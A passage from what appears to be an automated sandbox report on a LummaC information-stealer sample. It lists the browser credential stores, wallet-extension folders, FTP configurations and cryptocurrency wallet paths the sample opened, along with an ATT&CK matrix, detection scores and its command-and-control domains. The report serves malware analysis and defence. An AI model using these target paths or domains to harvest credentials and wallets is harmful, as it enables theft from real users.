              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeDirectory queried: C:\Users\user\Documents\IZMFBFKMEBJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
              Source: Yara matchFile source: Process Memory Space: ARoqFi68Nr.exe PID: 7380, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: ARoqFi68Nr.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		44
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		1
              Query Registry              		Remote Services41
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory851
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager44
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials223
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              ARoqFi68Nr.exe55%ReversingLabsWin32.Infostealer.Tinba
              ARoqFi68Nr.exe52%VirustotalBrowse
              ARoqFi68Nr.exe100%AviraTR/Crypt.TPM.Gen
              ARoqFi68Nr.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://mindhandru.buzz/yW100%Avira URL Cloudmalware
              https://mindhandru.buzz/o100%Avira URL Cloudmalware
              https://mindhandru.buzz/g100%Avira URL Cloudmalware
              https://mindhandru.buzz/piO100%Avira URL Cloudmalware
              https://mindhandru.buzz/apiz100%Avira URL Cloudmalware
              https://mindhandru.buzz/K7100%Avira URL Cloudmalware
              https://mindhandru.buzz/W100%Avira URL Cloudmalware
              https://mindhandru.buzz/piw100%Avira URL Cloudmalware
              https://mindhandru.buzz/apiulti100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              mindhandru.buzz
              		104.21.11.101
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                scentniej.buzzfalse
                  		high
                  rebuildeso.buzzfalse
                    		high
                    appliacnesot.buzzfalse
                      		high
                      screwamusresz.buzzfalse
                        		high
                        cashfuzysao.buzzfalse
                          		high
                          inherineau.buzzfalse
                            		high
                            prisonyfork.buzzfalse
                              		high
                              hummskitnj.buzzfalse
                                		high
                                mindhandru.buzzfalse
                                  		high
                                  https://mindhandru.buzz/apifalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://mindhandru.buzz/ARoqFi68Nr.exe, 00000000.00000003.1389987289.000000000567F000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1389634246.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1388361189.0000000005679000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1388658686.0000000005675000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1475695276.0000000005680000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000002.1598656107.0000000001151000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1597013208.000000000114F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ARoqFi68Nr.exe, 00000000.00000003.1363370699.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363487803.00000000056BD000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1363304728.00000000056BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.rootca1.amazontrust.com/rootca1.crl0ARoqFi68Nr.exe, 00000000.00000003.1476967161.00000000056A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://mindhandru.buzz/yWARoqFi68Nr.exe, 00000000.00000003.1502111690.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501331711.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1505633372.000000000567A000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1501151618.000000000567A000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
